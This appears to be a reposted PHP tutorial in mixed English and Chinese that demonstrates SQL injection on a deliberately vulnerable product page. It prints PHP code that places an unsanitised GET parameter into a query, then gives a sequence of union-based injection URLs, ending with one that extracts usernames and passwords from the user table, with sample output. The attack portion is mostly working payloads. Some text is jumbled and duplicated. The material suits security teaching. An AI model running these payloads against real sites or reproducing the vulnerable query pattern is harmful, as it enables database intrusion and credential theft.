The content of this article is a complete process of SQL injection in PHP. Now I share it with everyone. Friends in need can refer to it.
After learning some skills of SQL injection, the following is Simple practice of SQL injection into PHP MYSQL
First observe two MYSQL data tables
User record table:
REATE TABLE `php_user` ( `id` int(11) NOT NULL auto_increment, `username` varchar(20) NOT NULL default '', `password` varchar(20) NOT NULL default '', `userlevel` char(2) NOT NULL default '0', PRIMARY KEY (`id`) ) TYPE=MyISAM AUTO_INCREMENT=3 ; INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10'); INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');
## Product record list:
CREATE TABLE `php_product` ( `id` int(11) NOT NULL auto_increment, `name` varchar(100) NOT NULL default '', `price` float NOT NULL default '0', `img` varchar(200) NOT NULL default '', PRIMARY KEY (`id`) ) TYPE=MyISAM AUTO_INCREMENT=3 ; INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg'); INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');
The following file is show_product.php used to display the product list. SQL injection also exploits the SQL statement vulnerability of this file
<?php
$conn = mysql_connect("localhost", "root", "root");
if(!$conn){
echo "数据库联接错误";
exit;
}
if (!mysql_select_db("phpsql")) {
echo "选择数据库出错" . mysql_error();
exit;
}
$tempID=$_GET['id'];
if($tempID<=0 || !isset($tempID)) $tempID=1;
$sql = "SELECT * FROM php_product WHERE id =$tempID";
echo $sql.'<br>';
$result = mysql_query($sql);
if (!$result) {
echo "查询出错" . mysql_error();
exit;
}
if (mysql_num_rows($result) == 0) {
echo "没有查询结果";
exit;
}
while ($row = mysql_fetch_assoc($result)) {
echo 'ID:'.$row["id"].'<br>';
echo 'name:'.$row["name"].'<br>';
echo 'price:'.$row["price"].'<br>';
echo 'image:'.$row["img"].'<br>';
}
?>$tempID is obtained from $_GET. We can construct the value of this variable to achieve the purpose of SQL injection
Construct the following links respectively:
1,
http://localhost/phpsql/index.php?id=1
Get the following outputSELECT * FROM php_product WHERE id =1 //当前执行的SQL语句
ID:1 name:name_1 price:12.2 image:images/name_1.jpg 2、 http://localhost/phpsql/index.php?id=1 or 1=1 得到输出 //一共两条产品资料列表 ID:1 name:name_1 price:12.2 image:images/name_1.jpg ID:2 name:name_2 price:35.25 image:images/name_2.jpg 1和2都得到资料列表输出,证明SQL语句执行成功 3、判断数据表字段数量 http://localhost/phpsql/index.php?id=1 union select 1,1,1,1 得到输出 //一共两条记录,注意第二条的记录为全1,这是union select联合查询的结果。 ID:1 name:name_1 price:12.2 image:images/name_1.jpg ID:1 name:1 price:1 image:1 4、判断数据表字段类型 http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65) 得到输出 ID:1 name:name_1 price:12.2 image:images/name_1.jpg ID:0 name:A price:0 image:A 注意第二条记录,如果后面的值等于A,说明这个字段与union查询后面构造的字段类型相符。此时union后面 为char(65),表示字符串类型。经过观察。可以发现name字段和image字段的类型都是字符串类型 5、大功告成,得到我们想要的东西: http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user 得到输出: SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user ##//Output two user information, name is the user name , image is the user password. ID:1 name:seven price:1 image:seven_pwd ID:1 name:swons price:1 image:swons_pwd Note that the ID=10000 in the URL is to not get the product information, only to get the following union query results. In more practical situations, the value of the ID is different. The username and password of the union must be placed in positions 2 and 4. Only in this way can it match the previous select statement. This is the characteristic of the union query statement Remarks: This is a simple injection method is more context-specific. In reality it's more complicated than this. But the principle is the same. related suggestion: Data security method for PHP to prevent SQL injection Example of method for PHP to prevent SQL injection The above is the detailed content of A complete process of SQL injection in PHP. For more information, please follow other related articles on the PHP Chinese website!SELECT * FROM php_product WHERE id =1 or 1=1 //当前执行的SQL语句
SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //当前执行的SQL语句
SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
